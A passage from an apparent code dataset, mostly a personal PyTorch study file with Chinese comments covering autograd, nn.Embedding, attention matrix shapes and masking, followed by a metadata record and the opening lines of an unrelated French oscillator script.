如果Tensor是一个标量(即它包含一个元素数据)则不需要为backward()指定任何参数,\n但是如果它有更多的元素,你需要指定一个gradient 参数来匹配张量的形状。\n\n\"\"\"\n\n\n#在这个情形中,y不再是个标量。torch.autograd无法直接计算出完整的雅可比行列,但是如果我们只想要vector-Jacobian product,只需将向量作为参数传入backward:\n\ngradients = torch.tensor([0.1, 1.0, 0.0001], dtype=torch.float)\ny.backward(gradients)\n\nprint(f\"x.grad = {x.grad}\\n\")\n\n\n#如果.requires_grad=True但是你又不希望进行autograd的计算, 那么可以将变量包裹在 with torch.no_grad()中:\nprint(x.requires_grad)\nprint((x ** 
2).requires_grad)\n\nwith torch.no_grad():\n print((x ** 2).requires_grad)\n\n\n#----------------------------------------------- 分割线 ----------------------------------------------\nx = torch.randn(10, 5, requires_grad = True)\ny = torch.randn(10, 5, requires_grad = True)\nz = torch.randn(10, 5, requires_grad = True)\nprint(f\"x.requires_grad = {x.requires_grad}\")\nprint(f\"x.grad_fn = {x.grad_fn}\\n\")\nwith torch.no_grad():\n w = x + y + z\n out = w.sum()\n #out.backward()\n print(f\"x.requires_grad = {x.requires_grad}\")\n print(f\"x.grad = {x.grad}\")\n print(f\"x.grad_fn = {x.grad_fn}\\n\")\n\n print(f\"w.requires_grad = {w.requires_grad}\")\n print(f\"w.grad = {w.grad}\")\n print(f\"w.grad_fn = {w.grad_fn}\\n\")\n\n print(f\"out.requires_grad = {out.requires_grad}\")\n print(f\"out.grad = {out.grad}\")\n print(f\"out.grad_fn = {out.grad_fn}\\n\")\n\nprint(f\"x.requires_grad = {x.requires_grad}\")\nprint(f\"w.requires_grad = {w.requires_grad}\")\n\n#----------------------------------------------- 分割线 ----------------------------------------------\nx = torch.randn(10, 5, requires_grad = True)\ny = torch.randn(10, 5, requires_grad = True)\nz = torch.randn(10, 5, requires_grad = True)\nprint(f\"x.requires_grad = {x.requires_grad}\")\nprint(f\"x.grad_fn = {x.grad_fn}\\n\")\n\nw = x + y + z\nout = w.sum()\n#out.backward()\nprint(f\"x.requires_grad = {x.requires_grad}\")\nprint(f\"x.grad = {x.grad}\")\nprint(f\"x.grad_fn = {x.grad_fn}\\n\")\n\nprint(f\"w.requires_grad = {w.requires_grad}\")\nprint(f\"w.grad = {w.grad}\")\nprint(f\"w.grad_fn = {w.grad_fn}\\n\")\n\nprint(f\"out.requires_grad = {out.requires_grad}\")\nprint(f\"out.grad = {out.grad}\")\nprint(f\"out.grad_fn = {out.grad_fn}\\n\")\n\nprint(f\"x.requires_grad = {x.requires_grad}\")\nprint(f\"w.requires_grad = {w.requires_grad}\")\n\n\n#----------------------------------------------- 分割线 ----------------------------------------------\nimport torch\nfrom torch.autograd import Variable\n\nx = torch.Tensor([[1.,2.,3.],[4.,5.,6.]]) #grad_fn是None\nx = Variable(x, requires_grad=True)\ny = x + 2\nz = y*y*3\nout = z.mean()\n#x->y->z->out\nprint(f\"x = {x}\\n\")\nprint(f\"y = {y}\\n\")\nprint(f\"z = {z}\\n\")\nprint(f\"out = {out}\\n\")\n\n\"\"\"\nx = tensor([[1., 2., 3.],\n [4., 5., 6.]], requires_grad=True)\n\ny = tensor([[3., 4., 5.],\n [6., 7., 8.]], grad_fn=)\n\nz = tensor([[ 27., 48., 75.],\n [108., 147., 192.]], grad_fn=)\n\nout = 99.5\n\n\n这里,我们可以将x假想成神经网络的输入,y是神经网络的隐藏层,z是神经网络的输出,\n最后的out是损失函数;或者说我们建立了一个简单的计算图,数据从x流向out。\n可以看到,只要x设置了requires_grad=True,那么计算图后续的节点用grad_fn记录了计算图中各步的传播过程。\n\"\"\"\n\n\nout.backward()\nprint(f\"x.grad = {x.grad}\\n\")\nprint(f\"y.grad = {y.grad}\\n\")\nprint(f\"z.grad = {z.grad}\\n\")\n#结果:\n\"\"\"\nx.grad = tensor([[3., 4., 5.],\n [6., 7., 8.]])\n\ny.grad = None\n\nz.grad = None\n\n拓展到深度学习,从输入开始,每层都有大量参数W和b,这些参数也是Tensor结构。给Tensor设置了requires_grad=True后,PyTorch会跟踪Tensor之后的所有计算,经过.backward()后,PyTorch自动帮我们计算损失函数对于这些参数的梯度,梯度存储在了.grad属性里,PyTorch会按照梯度下降法更新参数。\n\n在PyTorch中,.backward()方法默认只会对计算图中的叶子节点求导。在上面的例子里,x就是叶子节点,y和z都是中间变量,他们的.grad属性都是None。而且,PyTorch目前只支持浮点数的求导。\n\n另外,PyTorch的自动求导一般只是标量对向量/矩阵求导。在深度学习中,最后的损失函数一般是一个标量值,是样本数据经过前向传播得到的损失值的和,而输入数据是一个向量或矩阵。在刚才的例子中,y是一个矩阵,.mean()对y求导,得到的是标量。\n\n\"\"\"\n\n#----------------------------------------------- 分割线 ----------------------------------------------\n\nimport torch\nfrom torch.autograd import Variable\n\nx = torch.Tensor([[1.,2.,3.],[4.,5.,6.]]) #grad_fn是None\nx = Variable(x, requires_grad=True)\ny = x + 2\nz = y*y*3\nout = z.mean()\n#x->y->z->out\nprint(f\"x = 
{x}\\n\")\nprint(f\"y = {y}\\n\")\nprint(f\"z = {z}\\n\")\nprint(f\"out = {out}\\n\")\n#反向传播 因为 out是一个纯量(scalar),out.backward() 等于out.backward(torch.tensor(1))。\nout.backward()\n\nprint(f\"x.grad = {x.grad}\\n\")\n\n\n#如果是z关于x求导就必须指定gradient参数:\nimport torch\nfrom torch.autograd import Variable\n\nx = torch.Tensor([[1.,2.,3.],[4.,5.,6.]]) #grad_fn是None\nx = Variable(x, requires_grad=True)\ny = x + 2\nz = y*y*3\nout = z.mean()\n#x->y->z->out\nprint(f\"x = {x}\\n\")\nprint(f\"y = {y}\\n\")\nprint(f\"z = {z}\\n\")\nprint(f\"out = {out}\\n\")\n\n#如果是z关于x求导就必须指定gradient参数:\n\ngradients = torch.Tensor([[2.,1.,1.],[3.,1.,1.]])\n\nz.backward(gradient=gradients)\n#若z不是一个标量,那么就先构造一个标量的值:L = torch.sum(z*gradient),再关于L对各个leaf Variable计算梯度\n#对x关于L求梯度\nprint(f\"x.grad = \\n{x.grad}\\n\")\n\n#结果:\n#tensor([[36., 24., 30.],\n# [36., 42., 48.]])\n\n#错误情况\n# z.backward()\n# print(x.grad)\n#报错:RuntimeError: grad can be implicitly created only for scalar outputs只能为标量创建隐式变量\n\n\n#----------------------------------------------- 分割线 ----------------------------------------------\n\"\"\"\nhttps://lulaoshi.info/machine-learning/neural-network/pytorch-tensor-autograd\n下面是一个使用PyTorch训练神经网络的例子。在这个例子中,我们随机初始化了输入x和输出y,分别作为模型的特征和要拟合的目标值。这个模型有两层,第一层是输入层,第二层为隐藏层,模型的前向传播如下所示:\n\nH=ReLU(W[1]X)\nY=W[2]H\n\"\"\"\n\n\nimport torch\n\ndtype = torch.float\ndevice = torch.device(\"cpu\") # 使用CPU\n# device = torch.device(\"cuda:0\") # 如果使用GPU,请打开注释\n\n# N: batch size\n# D_in: 输入维度\n# H: 隐藏层\n# D_out: 输出维度\nN, D_in, H, D_out = 64, 1000, 100, 10\n\n# 初始化随机数x, y\n# x, y用来模拟机器学习的输入和输出\nx = torch.randn(N, D_in, device=device, dtype=dtype)\ny = torch.randn(N, D_out, device=device, dtype=dtype)\n\n# 初始化模型的参数w1和w2\n# 均设置为 requires_grad=True\n# PyTorch会跟踪w1和w2上的计算,帮我们自动求导\nw1 = torch.randn(D_in, H, device=device, dtype=dtype, requires_grad=True)\nw2 = torch.randn(H, D_out, device=device, dtype=dtype, requires_grad=True)\n\nlearning_rate = 1e-6\nfor t in range(500):\n # 前向传播过程:\n # h1 = relu(x * w1)\n # y = h1 * w2\n y_pred = x.mm(w1).clamp(min=0).mm(w2)\n\n # 计算损失函数loss\n # loss是误差的平方和\n loss = (y_pred - y).pow(2).sum()\n if t % 100 == 99:\n print(t, loss.item())\n\n # 反向传播过程:\n # PyTorch会对设置了requires_grad=True的Tensor自动求导,本例中是w1和w2\n # 执行完backward()后,w1.grad 和 w2.grad 里存储着对于loss的梯度\n loss.backward()\n\n # 根据梯度,更新参数w1和w2\n with torch.no_grad():\n w1 -= learning_rate * w1.grad\n w2 -= learning_rate * w2.grad\n\n # 将 w1.grad 和 w2.grad 中的梯度设为零\n # PyTorch的backward()方法计算梯度会默认将本次计算的梯度与.grad中已有的梯度加和\n # 必须在下次反向传播前先将.grad中的梯度清零\n w1.grad.zero_()\n w2.grad.zero_()\n\n\n\n\n#=======================================================================================\n# pytorch nn.Embedding的用法和理解\n#=======================================================================================\n\"\"\"\nhttps://www.jianshu.com/p/63e7acc5e890\n\ntorch.nn.Embedding(num_embeddings, embedding_dim, padding_idx=None, max_norm=None, norm_type=2.0, scale_grad_by_freq=False, sparse=False, _weight=None)\n其为一个简单的存储固定大小的词典的嵌入向量的查找表,意思就是说,给一个编号,嵌入层就能返回这个编号对应的嵌入向量,嵌入向量反映了各个编号代表的符号之间的语义关系。\n\n输入为一个编号列表,输出为对应的符号嵌入向量列表。\n\n参数解释\nnum_embeddings (python:int) – 词典的大小尺寸,比如总共出现5000个词,那就输入5000。此时index为(0-4999)\nembedding_dim (python:int) – 嵌入向量的维度,即用多少维来表示一个符号。\npadding_idx (python:int, optional) – 填充id,比如,输入长度为100,但是每次的句子长度并不一样,后面就需要用统一的数字填充,而这里就是指定这个数字,这样,网络在遇到填充id时,就不会计算其与其它符号的相关性。(初始化为0)\nmax_norm (python:float, optional) – 最大范数,如果嵌入向量的范数超过了这个界限,就要进行再归一化。\nnorm_type (python:float, optional) – 指定利用什么范数计算,并用于对比max_norm,默认为2范数。\nscale_grad_by_freq (boolean, optional) – 
根据单词在mini-batch中出现的频率,对梯度进行放缩。默认为False.\nsparse (bool, optional) – 若为True,则与权重矩阵相关的梯度转变为稀疏张量。\n\n\"\"\"\n\nbatch = [['i', 'am', 'a', 'boy', '.'], ['i', 'am', 'very', 'luck', '.'], ['how', 'are', 'you', '?']]\n#可见,每个句子的长度,即每个内层list的元素数为:5,5,4。这个长度也要记录。\nlens = [5,5,4]\n\nbatch = [[3,6,5,6,7],[6,4,7,9,5],[4,5,8,7]]\n\n#同时,每个句子结尾要加EOS,假设EOS在词典中的index是1。\nbatch = [[3,6,5,6,7,1],[6,4,7,9,5,1],[4,5,8,7,1]]\n\n\n#那么长度要更新:\nlens = [6,6,5]\n\n#很显然,这个mini-batch中的句子长度不一致!所以为了规整的处理,对长度不足的句子,进行填充。填充PAD假设序号是2,填充之后为:\nbatch = [[3,6,5,6,7,1],[6,4,7,9,5,1],[4,5,8,7,1,2]]\n\n\n#batch还要转成LongTensor:\n\nbatch=torch.LongTensor(batch)\nprint(f\"batch.shape = {batch.shape}\")\n#batch.shape = torch.Size([3, 6])\n\n#建立词向量层\nembed = torch.nn.Embedding(num_embeddings=20,embedding_dim=8)\n\n\n#好了,现在使用建立了的embedding直接通过batch取词向量了,如:\nembed_batch = embed(batch)\nprint(f\"embed_batch.shape = {embed_batch.shape}\")\n#embed_batch.shape = torch.Size([3, 6, 8])\nprint(f\"embed_batch = \\n{embed_batch}\")\n\n\n\n\n\n\n#=======================================================================================\nimport numpy as np\nimport torch\nimport torch.nn as nn\n# 2D\n# Input size表示这批有2个句子,每个句子由4个单词构成\nInput = torch.LongTensor([[1,2,4,5],[4,3,2,9]])\nprint(f\"Input = \\n{Input}\")\n\n# 构造一个(假装)vocab size=10,每个vocab用3-d向量表示的table\nembedding = nn.Embedding(num_embeddings=10, embedding_dim=3)\n# 可以看做每行是一个词汇的向量表示!\nprint(f\"embedding.weight = \\n{embedding.weight}\")\n\nOut = embedding(Input)\nprint(f\"Out = \\n{Out}\")\n\n#a=embedding(input)是去embedding.weight中取对应index的词向量!\n#看a的第一行,input处index=1,对应取出weight中index=1的那一行。其实就是按index取词向量!\nembedding = nn.Embedding(num_embeddings=10, embedding_dim=6)\nOut = embedding(Input)\nprint(f\"Out = \\n{Out},\\n Out.shape = {Out.shape}\")\n\n\nembedding = nn.Embedding(num_embeddings=10, embedding_dim=12)\nOut = embedding(Input)\nprint(f\"Out = \\n{Out},\\n Out.shape = {Out.shape}\")\n\n\nembedding = nn.Embedding(num_embeddings=5, embedding_dim=6) # num_embeddings必须大于input的最大元素值\nOut = embedding(Input)\nprint(f\"Out = \\n{Out},\\n Out.shape = {Out.shape}\")\n# IndexError: index out of range in self\n\n\n# 3D\nInput = torch.LongTensor([[[1,2,4,5],[4,3,2,9],[10,12,18,11]],[[1,2,4,5],[4,3,2,9],[22,21,18,20]]])\nprint(f\"Input = \\n{Input}\")\nprint(f\" Input.shape = {Input.shape}\")\nembedding = nn.Embedding(num_embeddings=30, embedding_dim=6) # num_embeddings必须大于input的最大元素值\nOut = embedding(Input)\nprint(f\"Out = \\n{Out},\\n Out.shape = {Out.shape}\")\n\n\n# 1D\nInput = torch.LongTensor([1,2,3,4])\nprint(f\"Input = \\n{Input}\")\nprint(f\" Input.shape = {Input.shape}\")\nembedding = nn.Embedding(num_embeddings=30, embedding_dim=6) # num_embeddings必须大于input的最大元素值\nOut = embedding(Input)\nprint(f\"Out = \\n{Out},\\n Out.shape = {Out.shape}\")\n\n# 2D\nInput = torch.LongTensor([1,2,3,4]).view(-1,1)\nprint(f\"Input = \\n{Input}\")\nprint(f\" Input.shape = {Input.shape}\")\nembedding = nn.Embedding(num_embeddings=30, embedding_dim=6) # num_embeddings必须大于input的最大元素值\nOut = embedding(Input)\nprint(f\"Out = \\n{Out},\\n Out.shape = {Out.shape}\")\n\n\n\nInput = torch.LongTensor([0.1,2.3,0.5,5.6]).view(-1,1) # input元素必须为整数,否则Embedding会将其转化为整数\nprint(f\"Input = \\n{Input}\")\nprint(f\" Input.shape = {Input.shape}\")\nembedding = nn.Embedding(num_embeddings=30, embedding_dim=6) # num_embeddings必须大于input的最大元素值\nOut = embedding(Input)\nprint(f\"Out = \\n{Out},\\n Out.shape = {Out.shape}\")\n\"\"\"\nInput =\ntensor([[0],\n [2],\n [0],\n [5]])\n Input.shape = torch.Size([4, 1])\nOut =\ntensor([[[ 1.9019, 
-0.8279, -0.4124, 0.4178, -0.0228, 0.5323]],\n\n [[-0.0520, 0.6144, -1.8603, -0.5358, 1.9237, 2.0032]],\n\n [[ 1.9019, -0.8279, -0.4124, 0.4178, -0.0228, 0.5323]],\n\n [[ 0.9151, -0.9837, 0.3220, 0.8575, -0.3587, 0.1849]]],\n grad_fn=),\n Out.shape = torch.Size([4, 1, 6])\n \"\"\"\n\n#==============================================================================\n# https://zhuanlan.zhihu.com/p/272844969\nembedding = nn.Embedding(5, 3) # 定义一个具有5个单词,维度为3的查询矩阵\nprint(embedding.weight) # 展示该矩阵的具体内容\ntest = torch.LongTensor([[0, 2, 0, 1],\n [1, 3, 4, 4]]) # 该test矩阵用于被embed,其size为[2, 4]\n# 其中的第一行为[0, 2, 0, 1],表示获取查询矩阵中ID为0, 2, 0, 1的查询向量\n# 可以在之后的test输出中与embed的输出进行比较\ntest = embedding(test)\nprint(test.size()) # 输出embed后test的size,为[2, 4, 3],增加\n# 的3,是因为查询向量的维度为3\nprint(test) # 输出embed后的test的内容\n\n\n\n\n\n#==================================Python中::(双冒号)的用法============================================\nprint(f\"list(range(10)[::2]) = {list(list(range(10)[::2]))}\")\n\nprint(f\"range(100)[5:18:2] = {list(range(100)[5:18:2])}\")\n\ns = range(20)\n\nprint(f\"s[::3] = {list(s[::3])}\")\n\n\nprint(f\"s[2::3] = {list(s[2::3])}\")\n\n\nprint(f\"s[:10:3] = {list(s[:10:3])}\")\n\n\nprint(f\"'123123123'[::3] = {'123123123'[::3]}\")\n\n\n# a[::-1]相当于 a[-1:-len(a)-1:-1],也就是从最后一个元素到第一个元素复制一遍。所以你看到一个倒序的东东。\n\nprint(f\"s[::-1] = {list(s[::-1])}\")\n\n\n\n\n\n\n#======================================== attention =============================================\na = torch.arange(96).reshape(2,4,12)\n\nb = a.view(2, -1, 2, 6)\n\nX = a.view(2, -1, 2, 6).transpose(1,2)\n\nC = X.transpose(-2, -1)\n\nB = torch.matmul(X, C)\n\nD = torch.matmul(B, X)\n\nprint(f\"a = a.shape = {a.shape} \\n{a}\\nb = b.shape = {b.shape} \\n{b} \\nX = X.shape = {X.shape} \\n{X}\\n\\\nC = C.shape = {C.shape}\\n {C}\\n B = B.shape = {B.shape} \\n{B}\\n D = D.shape = {D.shape} \\n{D}\\n\")\n\n\"\"\"\nX =\ntensor([[[[ 0, 1, 2, 3, 4, 5],\n [12, 13, 14, 15, 16, 17],\n [24, 25, 26, 27, 28, 29],\n [36, 37, 38, 39, 40, 41]],\n\n [[ 6, 7, 8, 9, 10, 11],\n [18, 19, 20, 21, 22, 23],\n [30, 31, 32, 33, 34, 35],\n [42, 43, 44, 45, 46, 47]]],\n\n\n [[[48, 49, 50, 51, 52, 53],\n [60, 61, 62, 63, 64, 65],\n [72, 73, 74, 75, 76, 77],\n [84, 85, 86, 87, 88, 89]],\n\n [[54, 55, 56, 57, 58, 59],\n [66, 67, 68, 69, 70, 71],\n [78, 79, 80, 81, 82, 83],\n [90, 91, 92, 93, 94, 95]]]])\nC =\ntensor([[[[ 0, 12, 24, 36],\n [ 1, 13, 25, 37],\n [ 2, 14, 26, 38],\n [ 3, 15, 27, 39],\n [ 4, 16, 28, 40],\n [ 5, 17, 29, 41]],\n\n [[ 6, 18, 30, 42],\n [ 7, 19, 31, 43],\n [ 8, 20, 32, 44],\n [ 9, 21, 33, 45],\n [10, 22, 34, 46],\n [11, 23, 35, 47]]],\n\n\n [[[48, 60, 72, 84],\n [49, 61, 73, 85],\n [50, 62, 74, 86],\n [51, 63, 75, 87],\n [52, 64, 76, 88],\n [53, 65, 77, 89]],\n\n [[54, 66, 78, 90],\n [55, 67, 79, 91],\n [56, 68, 80, 92],\n [57, 69, 81, 93],\n [58, 70, 82, 94],\n [59, 71, 83, 95]]]])\nB =\ntensor([[[[ 55, 235, 415, 595],\n [ 235, 1279, 2323, 3367],\n [ 415, 2323, 4231, 6139],\n [ 595, 3367, 6139, 8911]],\n\n [[ 451, 1063, 1675, 2287],\n [ 1063, 2539, 4015, 5491],\n [ 1675, 4015, 6355, 8695],\n [ 2287, 5491, 8695, 11899]]],\n\n\n [[[15319, 18955, 22591, 26227],\n [18955, 23455, 27955, 32455],\n [22591, 27955, 33319, 38683],\n [26227, 32455, 38683, 44911]],\n\n [[19171, 23239, 27307, 31375],\n [23239, 28171, 33103, 38035],\n [27307, 33103, 38899, 44695],\n [31375, 38035, 44695, 51355]]]])\nD =\ntensor([[[[ 34200, 35500, 36800, 38100, 39400, 40700],\n [ 192312, 199516, 206720, 213924, 221128, 228332],\n [ 350424, 363532, 376640, 389748, 402856, 415964],\n [ 508536, 
527548, 546560, 565572, 584584, 603596]],\n\n [[ 168144, 173620, 179096, 184572, 190048, 195524],\n [ 403152, 416260, 429368, 442476, 455584, 468692],\n [ 638160, 658900, 679640, 700380, 721120, 741860],\n [ 873168, 901540, 929912, 958284, 986656, 1015028]]],\n\n\n [[[ 5702232, 5785324, 5868416, 5951508, 6034600, 6117692],\n [ 7056120, 7158940, 7261760, 7364580, 7467400, 7570220],\n [ 8410008, 8532556, 8655104, 8777652, 8900200, 9022748],\n [ 9763896, 9906172, 10048448, 10190724, 10333000, 10475276]],\n\n [[ 7522704, 7623796, 7724888, 7825980, 7927072, 8028164],\n [ 9119376, 9241924, 9364472, 9487020, 9609568, 9732116],\n [10716048, 10860052, 11004056, 11148060, 11292064, 11436068],\n [12312720, 12478180, 12643640, 12809100, 12974560, 13140020]]]])\n.shape =\ntorch.Size([2, 4, 12])\nb.shape =\ntorch.Size([2, 4, 2, 6])\nX.shape =\ntorch.Size([2, 2, 4, 6])\nC.shape =\ntorch.Size([2, 2, 6, 4])\nB.shape =\ntorch.Size([2, 2, 4, 4])\nD.shape =\ntorch.Size([2, 2, 4, 6])\n\"\"\"\n\n\n#=====================================attention QKV================================================\na = torch.arange(60).reshape(3, 5, 4) # batch, target_len, feats\nb = torch.arange(72).reshape(3, 6, 4) # batch, seq_len, feats\nc = torch.arange(144).reshape(3, 6, 8) # batch, seq_len, val_feats\n\nd = torch.matmul(a, b.transpose(-2, -1))\n\ne = torch.matmul(d, c)\nprint(f\"a = \\n{a}\\nb = \\n{b}\\nc = \\n{c}\\nd = \\n{d}\\ne = \\n{e}\\n\")\n\nprint(f\"a.shape = \\n{a.shape}\\nb.shape = \\n{b.shape}\\nc.shape = \\n{c.shape}\\nd.shape = \\n{d.shape}\\ne.shape = \\n{e.shape}\\n\")\n\n\n\n\n\n\n#=========================================展示mask的过程 mask() =============================================\nimport torch\nimport math\n\n\n\nq = torch.Tensor([np.random.random(10),np.random.random(10),np.random.random(10), np.random.random(10), np.zeros((10,1)), np.zeros((10,1))])\nk = torch.Tensor([np.random.random(10),np.random.random(10),np.random.random(10), np.random.random(10), np.zeros((10,1)), np.zeros((10,1))])\nscores = torch.matmul(q, k.transpose(0,1)) / math.sqrt(10)\nmask = torch.Tensor([1,1,1,1,0,0])\nmask1 = mask.unsqueeze(1)\nscores1 = scores.masked_fill(mask1==0, -np.inf)\n\n\n\nmas = torch.from_numpy( np.triu(np.ones((6,6)), k=1),).byte()\nscores2 = scores.masked_fill(mas==0, -np.inf)\n\n\n\n\n\n\"\"\"\n5. 
masked_fill_(mask, value)方法\n\n其中mask是张量,元素是布尔值, value是要填充的值。该方法会在mask中为True的位置上填充value值。mask和value的形状要么是相同的, 要么是可以进行广播的, 否则会报错。\n\"\"\"\n#=========================================展示mask的过程 mask() =============================================\n# https://codeantenna.com/a/SqCLQ4AQNN\nimport torch\na=torch.tensor([[[5,5,5,5], [6,6,6,6], [7,7,7,7]], [[1,1,1,1],[2,2,2,2],[3,3,3,3]]])\nprint(f\"a = {a}\")\n\"\"\"\ntensor([[[5, 5, 5, 5],\n [6, 6, 6, 6],\n [7, 7, 7, 7]],\n\n [[1, 1, 1, 1],\n [2, 2, 2, 2],\n [3, 3, 3, 3]]])\n\"\"\"\nprint(a.size())\n#torch.Size([2, 3, 4])\n\n#############################################3\nmask = torch.ByteTensor([[[1],[1],[0]],[[0],[1],[1]]])\nprint(f\"mask.size() = {mask.size()}\")\n#torch.Size([2, 3, 1])\nb = a.masked_fill(mask, value=torch.tensor(-1e9))\nprint(f\"b1 = {b}\")\n\n\n\n\n\n#可以看到a和mask的shape对应分别是 2 3 4 对应 2 3 1 ,可以看到mask为中的第一个1,使得a的第一行全部被mask掉了,那么我把mask的shape改成2 3 4 ,是不是可以指定位置mask掉呢\nmask1 = torch.ByteTensor([[[1,1,0,0],[1,0,0,0],[0,0,0,0]],[[0,0,0,0],[1,1,1,1],[1,1,1,1]]])\nb = a.masked_fill(mask1, value=torch.tensor(-1e9))\n\n\n#的确可以,好的,如果shape相同,那就是对应位置被mask掉,\n#那么现在,我把mask的shape改成1,3,4 a保持为 2 ,3 ,4 会不会对于a的最外层的两个维度进行一样的mask呢?\n\nmask = torch.ByteTensor([[[1,1,0,0],[1,0,0,0],[0,0,0,0]]])\nb1 = a.masked_fill(mask, value=torch.tensor(-1e9))\nprint(f\"b = {b1}\")\n\"\"\"\ntensor([[[-1000000000, -1000000000, 5, 5],\n [-1000000000, 6, 6, 6],\n [ 7, 7, 7, 7]],\n\n [[-1000000000, -1000000000, 1, 1],\n [-1000000000, 2, 2, 2],\n [ 3, 3, 3, 3]]])\n\"\"\"\nprint(f\"a.shape() = {a.shape()}\")\n\n#的确是这样的,最外层的两个维度进行了相同的mask\n#那么再改一改,mask改成1,1,4,这样是不是行a都会被相同的mask掉\nmask = torch.ByteTensor([[[1,1,0,0]]])\nb = a.masked_fill(mask, value=torch.tensor(-1e9))\nprint(f\"b = {b}\")\n\"\"\"\ntensor([[[-1000000000, -1000000000, 5, 5],\n [-1000000000, -1000000000, 6, 6],\n [-1000000000, -1000000000, 7, 7]],\n\n [[-1000000000, -1000000000, 1, 1],\n [-1000000000, -1000000000, 2, 2],\n [-1000000000, -1000000000, 3, 3]]])\n\"\"\"\n\n\n\n\nimport torch\n\nmask = torch.randint(0, 2, (3, 1)).bool()\ntarget = torch.randn(3, 2)\nprint(target)\n# tensor([[-0.4297, 0.6459],\n# [ 1.2334, -1.5065],\n# [ 0.1295, 0.2587]])\n\nprint(mask)\n# tensor([[False],\n# [False],\n# [ True]])\n\n# 注意mask和target是可以广播的\ntarget.masked_fill_(mask, -100)\nprint(target)\n# tensor([[-100.0000, -100.0000],\n# [ -100.0000, -100.0000],\n# [-1.0000, -1.0000]])\n# 如果执行target.masked_fill(mask, -1), 是非in_place操作, 那么target本身的值不会改变\n\n\n\nimport torch\nimport torch.nn as nn\na = torch.randint(0, 255, (2, 3, 3))\nprint(f\"a = {a}\")\nmask = torch.tensor([[1, 0, 0], [0, 1, 0], [0, 0, 1]]).bool()\nprint(f\"mask = {mask}\")\na.masked_fill_(~mask, 0)\nprint(f\"a = {a}\")\n\n\n# 当然, 你也可以自己手动mask\na = torch.tensor([[1,2,3], [2,1,0]])\nmodel = nn.Embedding(num_embeddings = 10, embedding_dim = 6)\nb = model(a)\nmask = (a!=0).float().unsqueeze(-1)\nresult = b * mask\n\n\n\n# 当然, 你也可以自己手动mask\n# attn_output = self.mha(x, x, x, mask)\n# x.shape=(128,31,d_model=128), mask.shape = torch.Size([128, 1, 31])\n# Q*K = (128,8,31,31) mask = (128,1,1,31)\na = torch.arange(48).reshape(2,2,3,4)\nmasK = torch.randint(0,2,(2,1,1,4))\nb = a+masK*(-1e9)\n\n\n# attn_output = self.mha(x, x, x, mask)\n# x.shape = torch.Size(128, 30,128), tgt_mask.shape = torch.Size([128, 30, 30])\n# Q*K = (128,8,30,30) mask = (128,1,30,30)\na = torch.arange(3*2*4*4).reshape(3,2,4,4)\nmasK = torch.randint(0,2,(3,1,4,4))\nb = a+masK*(-1e9)\n\n\n\na = torch.arange(3*2*4*4).reshape(3,2,4,4)\nmasK = torch.randint(0,2,(3,1,1,4))\nb = a+masK*(-1e9)\n\n\n\n# 
attn_output = self.src_mha(x, memory, memory, src_mask) # q, k, v\n# x.shape = torch.Size(128, 30,128),src_mask.shape = torch.Size([128, 1, 31])\n# Q*K = (128,8,30,31) mask = (128,1,1,31)\na = torch.arange(3*2*3*4).reshape(3,2,3,4)\nmasK = torch.randint(0,2,(3,1,1,4))\nb = a+masK*(-1e9)\n\n\n\n\n\n#========================== 展示mask叠加的过程============================================\n\nseq_len = 5 # 30\nbatchsize = 3 #128\npad = 0\n\n\n\ntgt = torch.randint(1, 10, (batchsize, seq_len))\ntgt[-1,-4:] = 0\ntgt[-2,-3:] = 0\ntgt[-3,-1:] = 0\n\ntgt_mask = (tgt != pad).unsqueeze(-2).type(torch.uint8)\nprint(f\"tgt_mask.shape = {tgt_mask.shape}\")\nprint(f\"tgt_mask = \\n{tgt_mask}\")\n\n\nattn_shape = (1, seq_len, seq_len)\nsub_mask = torch.from_numpy(np.triu(np.ones(attn_shape), k=1) .astype('uint8'))==0\nsub_mask = sub_mask.type(torch.uint8)\nprint(f\"sub_mask = \\n{sub_mask}\")\n\n\ntgt_mask = tgt_mask & sub_mask\nprint(f\"tgt_mask.shape = {tgt_mask.shape}\")\nprint(f\"tgt_mask = {tgt_mask}\")\n\n\n\n#============================================================================\ndef subsequent_mask(size):\n \"Mask out subsequent positions.\"\n ##生成向后遮掩的掩码张量,参数size是掩码张量最后两个维度的大小,它最后两维形成一个方阵\n attn_shape = (1, size, size)\n #然后使用np.ones方法向这个形状中添加1元素,形成上三角阵(k=1)\n subsequent_mask = np.triu(np.ones(attn_shape), k=1).astype('uint8')\n return torch.from_numpy(subsequent_mask)\n\n\ntrg = torch.randint(1, 10, (batchsize, seq_len))\ntrg[-1,-4:] = 0\ntrg[-2,-3:] = 0\ntrg[-3,-1:] = 0\ntrg_mask = (trg == pad ).unsqueeze(-2).type(torch.FloatTensor) # [batch, 1, seq_len] torch.Size([128, 1, 30])\nprint(f\"trg_mask = \\n{trg_mask}\")\n\n\nlook_ahead_mask = subsequent_mask(trg.size(-1)).type_as(trg_mask.data)# torch.Size([1, 30, 30])\nprint(f\"look_ahead_mask = \\n{look_ahead_mask}\")\n\n# 将 pad 产生的 mask,和序列一次预测下一个单词产生的 mask 结合起来\ncombined_mask = torch.max(trg_mask, look_ahead_mask) # torch.Size([128, 30, 30])\nprint(f\"combined_mask = \\n{combined_mask}\")\n\n\n\n\na = torch.arange(24).reshape(2,3,4)\n# tensor([[[ 0, 1, 2, 3],\n# [ 4, 5, 6, 7],\n# [ 8, 9, 10, 11]],\n\n# [[12, 13, 14, 15],\n# [16, 17, 18, 19],\n# [20, 21, 22, 23]]])\n\n\nprint(f\"a[:,-1] = {a[:,-1]}\")\n# tensor([[ 8, 9, 10, 11],\n# [20, 21, 22, 23]])\n\n\nprint(f\"a[:,-1,:-1] = {a[:,-1,:-1]}\")\n# tensor([[ 8, 9, 10],\n# [20, 21, 22]])\n\n\nprint(f\"a[:,-1,-1] = {a[:,-1,-1]}\")\n# tensor([11, 23])\n","repo_name":"junjiecjj/Python","sub_path":"PytorchTutor/Pytorch/pytorch_tutor.py","file_name":"pytorch_tutor.py","file_ext":"py","file_size_in_byte":43584,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22859292703","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.integrate import odeint\nfrom random import *\nimport sys\n\n\n###################################################################################################################################################\n################################################## PROGRAMME PRINCIPALE ##########################################################################\n###################################################################################################################################################\n\ndef main_oscillateur():\n\n print(\"-------------------------------------------------------------------\")\n print(\"--------------------- DEBUT DU PROGRAMME --------------------------\")\n 
